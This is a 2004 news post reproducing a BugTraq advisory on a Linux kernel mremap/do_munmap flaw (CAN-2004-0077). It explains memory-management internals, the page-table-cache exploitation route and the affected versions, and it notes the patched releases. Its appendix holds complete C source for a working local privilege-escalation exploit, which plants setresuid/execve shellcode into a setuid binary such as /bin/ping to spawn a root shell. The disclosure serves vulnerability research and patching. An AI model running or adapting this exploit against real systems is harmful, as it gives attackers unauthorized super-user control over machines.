Linux: do_mremap VMA limit local privilege escalation

Submitted by lewk
on March 2, 2004 - 11:12am

A new security vulnerability has been found inside of the mremap(2) system call. This vulnerability is completely unrelated to the mremap bug which was disclosed a few months ago. Since no special privileges are required to use this system call, any process may use its unexpected behavior to disrupt the kernel memory management subsystem, which could leave an attacker with full super-user privileges.

This vulnerability is already fixed in 2.6.3 [story], 2.4.25 [story] and 2.2.26 [story]. Read on for a very detailed description of this vulnerability, and proof-of-concept exploitation code.


From: Paul Starzetz [email blocked]
To: BugTraq
Subject: mremap(2) full details available
Date: Mar 1 2004 5:45PM

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Synopsis:  Linux kernel do_mremap VMA limit local privilege escalation
           vulnerability
Product:   Linux kernel
Version:   2.2 up to and including 2.2.25, 2.4 up to and including 2.4.24,
           2.6 up to and including 2.6.2
Vendor:    http://www.kernel.org/
URL:       http://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt
CVE:       CAN-2004-0077
Author:    Paul Starzetz <ihaquer isec pl>
Date:      March 1, 2004


Issue:
======

A critical security vulnerability has been found in the Linux kernel memory
management code inside the mremap(2) system call, due to a missing check of a
function return value. This bug is completely unrelated to the mremap bug
disclosed on 05-01-2004, except that it concerns the same internal kernel
function.


Details:
========

The Linux kernel manages a list of user-addressable valid memory locations on
a per-process basis. Every process owns a singly linked list of so-called
virtual memory area descriptors (from now on just VMAs). Every VMA describes
the start of a valid memory region, its length, and various memory flags such
as page protection.

Every VMA in the list corresponds to a part of the process's page table. The
page table contains descriptors (page table entries, or PTEs for short) of the
physical memory pages seen by the process. A VMA descriptor can thus be
understood as a high-level description of a particular region of the
process's page table, storing PTE properties such as the page R/W flag.

The mremap() system call provides resizing (shrinking or growing) as well as
moving of existing virtual memory areas, or any of their parts, across the
process's addressable space.

Moving a part of the virtual memory from inside a VMA to a new location
requires creating a new VMA descriptor as well as copying the underlying page
table entries described by the VMA from the old to the new location in the
process's page table.

To accomplish this task the do_mremap code calls the do_munmap() internal
kernel function to remove any existing memory mapping at the new location as
well as to remove the old virtual memory mapping. Unfortunately the code
doesn't test the return value of do_munmap(), which may fail if the maximum
number of available VMA descriptors has been exceeded. This happens if one
tries to unmap the middle part of an existing memory mapping and the process's
limit on the number of VMAs (currently 65535) has been reached.

One of the possible situations can be illustrated with the following picture.
The corresponding page table entries (PTEs) have been marked with o and x:

Before mremap():

(oooooooooooooooooooooooo)     (xxxxxxxxxxxx)
[----------VMA1----------]     [----VMA2----]
      [REMAPPED-VMA] <---------------|


After mremap() without VMA limit:

(oooo)(xxxxxxxxxxxx)(oooo)
[VMA3][REMAPPED-VMA][VMA4]


After mremap() with the VMA limit reached:

(ooooxxxxxxxxxxxxxxoooo)
[---------VMA1---------]
     [REMAPPED-VMA]


Once the maximum number of VMAs in the process's VMA list has been reached,
do_munmap() will refuse to create the necessary VMA hole, because doing so
would split the original VMA into two disjoint VMAs and exceed the VMA
descriptor limit.

Due to the missing return value check after trying to unmap the middle of
VMA1 (this is the first invocation of do_munmap inside the do_mremap code),
the corresponding page table entries from VMA2 are still inserted into the
page table location described by VMA1 and thus become subject to VMA1's page
protection flags. It must also be mentioned that the original PTEs in VMA1
are lost, leaving the corresponding page frames unusable forever.

The kernel also tries to insert the overlapping VMA into the VMA descriptor
list, but this fails due to further checks in the low-level VMA manipulation
code. The low-level VMA list check in the 2.4 and 2.6 kernel versions just
calls BUG(), thereby terminating the malicious process.

There are also two other unchecked calls to do_munmap() inside the do_mremap()
code, and we believe that the second occurrence of the unchecked do_munmap is
also exploitable. The second occurrence takes place if the VMA to be remapped
is being truncated in place. Note that do_munmap can also fail under an
exceptional low-memory condition while trying to allocate a VMA descriptor.


Exploitation:
=============

The vulnerability turned out to be very easily exploitable. Our first idea was
to move PTEs from one VMA mapping a read-only file (like /etc/passwd) to
another, writable VMA. This approach failed because after the BUG() macro has
been invoked, the mmap semaphore of the memory descriptor is left in a closed
(that is, down_write()) state, thus preventing any further memory operations
that acquire the semaphore in other clone threads.

Our attention then turned to the page table cache code, which was introduced
early in the 2.4 series but not enabled by default. Kernels later than 2.4.19
enable the page table cache. The basic idea of a page table cache is to keep
free page frames recently used for page tables in a linked list, to speed up
the allocation of new page tables.

On Linux every process owns a reference to a memory descriptor (mm_struct)
which contains a pointer to a page directory. The page directory is a single
page frame (we describe the case of 4 KB pages without PAE) containing 1024
pointers to the page tables. A single page table page on the i386
architecture holds 1024 PTEs describing up to 4 MB of the process's virtual
memory. A single PTE contains the physical address of the page mapped at the
PTE's virtual address and the page access rights.

The page tables are allocated on demand when a page fault occurs. They are
also freed, and the corresponding page frames released to the memory manager,
if a process unmaps parts of its virtual memory spanning at least one page
table page, that is, a region containing at least one 4 MB sized and 4 MB
aligned memory area.

There are two paths when a new page table must be allocated: the slow one and
the fast one. The fast path takes one page from the head of the page table
cache, while the slow one just calls get_free_page(). This works well if the
pages in the page table cache have been properly cleared before being
inserted into the cache. Normally the page tables are cleared by
zap_page_range(), which is called from do_munmap. It is very important for
the proper operation of the Linux memory management that all locations of the
process's page table actually containing a valid PTE are covered by a
corresponding VMA descriptor.

In the case of the unchecked do_munmap inside the mremap code we have found a
condition that leaves a part of the page table uncovered by a VMA. The
offending code is:

[269]	if (old_len >= new_len) {
		do_munmap(current->mm, addr+new_len, old_len - new_len);
		if (!(flags & MREMAP_FIXED) || (new_addr == addr))
			goto out;
	}

This piece of code is responsible for truncating, in place, the VMA the user
wants to remap. It can easily be seen that do_munmap will fail if
[addr+new_len, addr+new_len + (old_len-new_len)] falls into the middle of a
VMA and the maximum number of allowed VMA descriptors has already been used
by the process. That also means that the page table will still contain valid
PTEs from addr+new_len on. Later in the mremap code a part of the
corresponding VMA is moved and truncated:

[179]	if (!move_page_tables(current->mm, new_addr, addr, old_len)) {
		unsigned long vm_locked = vma->vm_flags & VM_LOCKED;

		if (allocated_vma) {
			*new_vma = *vma;
			new_vma->vm_start = new_addr;
			new_vma->vm_end = new_addr+new_len;
			new_vma->vm_pgoff += (addr-vma->vm_start) >> PAGE_SHIFT;

but more PTEs (namely old_len) than the length of the created VMA are moved
from the old location if a new location has been specified along with the
MREMAP_MAYMOVE flag. This works well only if the previous do_munmap did not
fail. This situation can be illustrated as follows:

before mremap:

       <--  old_len -->
(oooooooooooooooooooooooooooo)
[------|-----VMA1-----|------]
            |---------------------------------> new_addr


after mremap, no VMA limit:
						new_len
(oooooo)              (oooooo)			(oooooo)
[-VMA1-]	      [-VMA3-]			[-VMA2-]


after mremap with the VMA limit reached:
						new_len   [*]
(oooooo                oooooo)			(oooooo)ooooooooo
[-----------VMA1-------------]			[-VMA2-]


Those [*] 'ownerless' PTEs in the page table can be further exploited, since
the memory manager has lost track of them. If the process now unmaps a
sufficiently big area of memory covering those ownerless PTEs, the underlying
page table frame will be inserted into the page table cache but will still
contain valid PTEs. That means that on the next page table frame allocation
inside a process P for an address A, our PTEs will appear in the page table
of process P! If that process tries to access the virtual memory at address
A, there will be no page fault either, provided the PTEs have appropriate
(read or write) access rights. In other words: through the page table cache
we are able to insert any data into the virtual memory space of another
process.

Our code takes the route through a setuid binary; however, this is not the
only possibility. We prepare the page table cache so that there is a single
empty page frame at the front of the cache, followed by a special page table
containing 'self-executing' pages. To fully understand how this works we must
dig into the execve() system call.

If a user calls execve(), the kernel removes all traces of the current
executable, including the virtual memory areas and page tables allocated to
the process. Then a new VMA for the stack at the top of the virtual memory is
created, where the program environment and arguments to the new binary are
stored (they have been preserved in kernel memory). This causes a first page
table frame to be allocated for the virtual memory region ranging from
0xbfc00000 to 0xc0000000.

Next, the .text and .data sections of the binary to be executed, as well as
the program interpreter responsible for further loading, are mapped into the
fresh virtual memory space. For the ELF format this is usually the ld.so
dynamic linker. At this point the kernel does not allocate the underlying
page tables. Only VMA descriptors are inserted into the process's VMA list.

After some further work that is not relevant here, the kernel transfers
control to the dynamic linker to execute the binary. This causes a second
page fault and triggers demand loading of the first code page of the dynamic
linker. On a standard Linux kernel this will also allocate a page frame for
the page table covering 0x40000000 to 0x40400000.

On a kernel with the page table cache enabled, both allocations will take
page frames from the cache first. That means that if the second page in the
cached page list contains valid PTEs, those could appear instead of the
regular dynamic linker code. It is easy to place the PTEs so that they shadow
the code section of the dynamic linker. Note that the first PTE of a page is
used by the cache code to maintain the page list. In our code we populate the
page table cache with special frames containing PTEs to pages that are filled
with a NOP landing zone and carry a short shell code at the end of the page.

We must also mention that the first mremap hole, disclosed on 05-01-2004, can
also be exploited very easily through the page table cache. Details are left
to the skilled reader.

A second possibility to exploit the mremap bug is to create another VMA
covering ownerless PTEs from a read-only file like /etc/passwd.


Impact:
=======

Since no special privileges are required to use the mremap(2) system call,
any process may use its unexpected behavior to disrupt the kernel memory
management subsystem.

Proper exploitation of this vulnerability leads to local privilege
escalation, giving an attacker full super-user privileges. The vulnerability
may also lead to a denial-of-service attack on the available system memory.

Tested and known to be vulnerable kernel versions are all <= 2.2.25,
<= 2.4.24 and <= 2.6.2. The 2.2.25 version of the Linux kernel does not
recognize the MREMAP_FIXED flag, but this does not prevent the bug from being
successfully exploited. All users are encouraged to patch all vulnerable
systems as soon as appropriate vendor patches are released. There is no
hotfix for this vulnerability. Limiting per-user virtual memory still permits
do_munmap() to fail.


Credits:
========

Paul Starzetz <ihaquer isec pl> has identified the vulnerability and
performed further research. COPYING, DISTRIBUTION, AND MODIFICATION OF
INFORMATION PRESENTED HERE IS ALLOWED ONLY WITH EXPRESS PERMISSION OF ONE OF
THE AUTHORS.


Disclaimer:
===========

This document and all the information it contains are provided "as is", for
educational purposes only, without warranty of any kind, whether express or
implied.

The authors reserve the right not to be responsible for the topicality,
correctness, completeness or quality of the information provided in this
document. Liability claims regarding damage caused by the use of any
information provided, including any kind of information which is incomplete
or incorrect, will therefore be rejected.


Appendix:
=========

/*
 *
 *	mremap missing do_munmap return check kernel exploit
 *
 *	gcc -O3 -static -fomit-frame-pointer mremap_pte.c -o mremap_pte
 *	./mremap_pte [suid] [[shell]]
 *
 *	Copyright (c) 2004  iSEC Security Research. All Rights Reserved.
 *
 *	THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED 
"AS IS"
 *	AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, 
MODIFICATION
 *	WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
 *
 */

#include <stdio.h>
#include <stdlib.h>

#include <errno.h>
#include <unistd.h>
#include <syscall.h>
#include <signal.h>
#include <time.h>
#include <sched.h>

#include <sys/mman.h>
#include <sys/wait.h>
#include <sys/utsname.h>

#include <asm/page.h>


#define str(s) #s
#define xstr(s) str(s)

//	this is for standard kernels with 3/1 split
#define STARTADDR	0x40000000
#define PGD_SIZE	(PAGE_SIZE * 1024)
#define VICTIM		(STARTADDR + PGD_SIZE)
#define MMAP_BASE	(STARTADDR + 3*PGD_SIZE)

#define DSIGNAL		SIGCHLD
#define CLONEFL		(DSIGNAL|CLONE_VFORK|CLONE_VM)

#define MREMAP_MAYMOVE	( (1UL) << 0 )
#define MREMAP_FIXED	( (1UL) << 1 )

#define __NR_sys_mremap	__NR_mremap


//	how many ld.so pages? this is the .text section length (like cat 	
//	/proc/self/maps) in pages
#define LINKERPAGES	0x14

//	suid victim
static char *suid="/bin/ping";

//	shell to start
static char *launch="/bin/bash";


_syscall5(ulong, sys_mremap, ulong, a, ulong, b, ulong, c, ulong, d, 		
	  ulong, e);
unsigned long sys_mremap(unsigned long addr, unsigned long old_len, 
			 unsigned long new_len, unsigned long flags, 
			 unsigned long new_addr);

static volatile unsigned base, *t, cnt, old_esp, prot, victim=0;
static int i, pid=0;
static char *env[2], *argv[2];
static ulong ret;


//	code to appear inside the suid image
static void suid_code(void)
{
__asm__(
	"		call	callme				\n"

//	setresuid(0, 0, 0), setresgid(0, 0, 0)
	"jumpme:	xorl	%ebx, %ebx			\n"
	"		xorl	%ecx, %ecx			\n"
	"		xorl	%edx, %edx			\n"
	"		xorl	%eax, %eax			\n"
	"		mov	$"xstr(__NR_setresuid)", %al	\n"
	"		int	$0x80				\n"
	"		mov	$"xstr(__NR_setresgid)", %al	\n"
	"		int	$0x80				\n"

//	execve(launch)
	"		popl	%ebx				\n"
	"		andl	$0xfffff000, %ebx		\n"
	"		xorl	%eax, %eax			\n"
	"		pushl	%eax				\n"
	"		movl	%esp, %edx			\n"
	"		pushl	%ebx				\n"
	"		movl	%esp, %ecx			\n"
	"		mov	$"xstr(__NR_execve)", %al	\n"
	"		int	$0x80				\n"

//	exit
	"		xorl	%eax, %eax			\n"
	"		mov	$"xstr(__NR_exit)", %al		\n"
	"		int	$0x80				\n"

	"callme:	jmp	jumpme				\n"
	);
}


static int suid_code_end(int v)
{
return v+1;
}


static inline void get_esp(void)
{
__asm__(
	"		movl	%%esp, %%eax			\n"
	"		andl	$0xfffff000, %%eax		\n"
	"		movl	%%eax, %0			\n"
	: : "m"(old_esp)
	);
}


static inline void cloneme(void)
{
__asm__(
	"		pusha					\n"
	"		movl $("xstr(CLONEFL)"), %%ebx		\n"
	"		movl %%esp, %%ecx			\n"
	"		movl $"xstr(__NR_clone)", %%eax		\n"
	"		int  $0x80				\n"
	"		movl %%eax, %0				\n"
	"		popa					\n"
	: : "m"(pid)
	);
}


static inline void my_execve(void)
{
__asm__(
	"		movl %1, %%ebx				\n"
	"		movl %2, %%ecx				\n"
	"		movl %3, %%edx				\n"
	"		movl $"xstr(__NR_execve)", %%eax	\n"
	"		int  $0x80				\n"
	: "=a"(ret)
	: "m"(suid), "m"(argv), "m"(env)
	);
}


static inline void pte_populate(unsigned addr)
{
unsigned r;
char *ptr;

	memset((void*)addr, 0x90, PAGE_SIZE);
	r = ((unsigned)suid_code_end) - ((unsigned)suid_code);
	ptr = (void*) (addr + PAGE_SIZE);
	ptr -= r+1;
	memcpy(ptr, suid_code, r);
	memcpy((void*)addr, launch, strlen(launch)+1);
}


//	hit VMA limit & populate PTEs
static void exhaust(void)
{
//	mmap PTE donor
	t = mmap((void*)victim, PAGE_SIZE*(LINKERPAGES+3), 
PROT_READ|PROT_WRITE,
		  MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
	if(MAP_FAILED==t)
		goto failed;

//	prepare shell code pages
	for(i=2; i<LINKERPAGES+1; i++)
		pte_populate(victim + PAGE_SIZE*i);
	i = mprotect((void*)victim, PAGE_SIZE*(LINKERPAGES+3), 
PROT_READ);
	if(i)
		goto failed;

//	lock unmap
	base = MMAP_BASE;
	cnt = 0;
	prot = PROT_READ;
	printf("\n"); fflush(stdout);
	for(;;) {
		t = mmap((void*)base, PAGE_SIZE, prot, 
			 MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
		if(MAP_FAILED==t) {
			if(ENOMEM==errno)
				break;
			else
				goto failed;
		}
		if( !(cnt%512) || cnt>65520 )
			printf("\r    MMAP #%d  0x%.8x - 0x%.8lx", cnt, 
base,
			base+PAGE_SIZE); fflush(stdout);
		base += PAGE_SIZE;
		prot ^= PROT_EXEC;
		cnt++;
	}

//	move PTEs & populate page table cache
	ret = sys_mremap(victim+PAGE_SIZE, LINKERPAGES*PAGE_SIZE, 
PAGE_SIZE,	
			 MREMAP_FIXED|MREMAP_MAYMOVE, VICTIM);
	if(-1==ret)
		goto failed;

	munmap((void*)MMAP_BASE, old_esp-MMAP_BASE);
	t = mmap((void*)(old_esp-PGD_SIZE-PAGE_SIZE), PAGE_SIZE, 		
		 PROT_READ|PROT_WRITE, 
MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 
		 0);
	if(MAP_FAILED==t)
		goto failed;

	*t = *((unsigned *)old_esp);
	munmap((void*)VICTIM-PAGE_SIZE, old_esp-(VICTIM-PAGE_SIZE));
	printf("\n[+] Success\n\n"); fflush(stdout);
	return;

failed:
	printf("\n[-] Failed\n"); fflush(stdout);
	_exit(0);
}


static inline void check_kver(void)
{
static struct utsname un;
int a=0, b=0, c=0, v=0, e=0, n;

	uname(&un);
	n=sscanf(un.release, "%d.%d.%d", &a, &b, &c);
	if(n!=3 || a!=2) {
		printf("\n[-] invalid kernel version string\n");
		_exit(0);
	}

	if(b==2) {
		if(c<=25)
			v=1;
	}
	else if(b==3) {
		if(c<=99)
			v=1;
	}
	else if(b==4) {
		if(c>18 && c<=24)
			v=1, e=1;
		else if(c>24)
			v=0, e=0;
		else
			v=1, e=0;
	}
	else if(b==5 && c<=75)
		v=1, e=1;
	else if(b==6 && c<=2)
		v=1, e=1;

	printf("\n[+] kernel %s  vulnerable: %s  exploitable %s",
		un.release, v? "YES" : "NO", e? "YES" : "NO" );
	fflush(stdout);

	if(v && e)
		return;
	_exit(0);
}



int main(int ac, char **av)
{
//	prepare
	check_kver();
	memset(env, 0, sizeof(env));
	memset(argv, 0, sizeof(argv));
	if(ac>1) suid=av[1];
	if(ac>2) launch=av[2];
	argv[0] = suid;
	get_esp();

//	mmap & clone & execve
	exhaust();
	cloneme();
	if(!pid) {
		my_execve();
	} else {
		waitpid(pid, 0, 0);
	}

return 0;
}

- -- 
Paul Starzetz
iSEC Security Research

http://isec.pl/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)

iD8DBQFAQ3a/C+8U3Z5wpu4RAtOFAKCtT8EM9zn5n/maQlSwTZu2wkdHawCfYlht
WdUJcKDwAzO44Dpmc9IqiEs=
=mMKN
-----END PGP SIGNATURE-----



